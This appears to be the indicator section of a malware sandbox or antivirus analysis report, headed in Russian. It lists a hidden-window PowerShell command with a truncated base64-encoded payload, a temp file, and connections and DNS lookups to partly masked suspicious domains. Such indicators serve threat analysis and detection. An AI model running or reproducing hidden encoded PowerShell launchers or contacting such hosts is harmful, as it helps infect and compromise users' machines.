Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABYAGgAYQB6AHoAdwB4AGkAbQBoAGsAcQA9ACcAQQB6AHkAYwBjAGkAcAB0AGsAaQB3ACcAOwAkAEcAZwBzAHIAcQBvAG4AdAByAHgAaAAgAD0AIAAnADkANAA4ACcAOwAkAFMAdwBsAG8AZQBqAGUAaABuAGUAegA9ACcASAB0AHkAaQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
- %TEMP%\851063.cvr
- 'ko##ata.com':443
- 'ko##ata.com':443
- DNS ASK ok##eo.com
- DNS ASK ko##ata.com
- DNS ASK pa#####ngtopsecrets.com
- DNS ASK ne###perty.in
- DNS ASK mc####.#00webhostapp.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABYAGgAYQB6AHoAdwB4AGkAbQBoAGsAcQA9ACcAQQB6AHkAYwBjAGkAcAB0AGsAaQB3ACcAOwAkAEcAZwBzAHIAcQBvAG4AdAByAHgAaAAgAD0AIAAnADkANAA4ACcAOwAkAFMAdwBsAG8AZQBqAGUAaABuAGUAegA9ACcASAB0AHkAaQB... (со скрытым окном)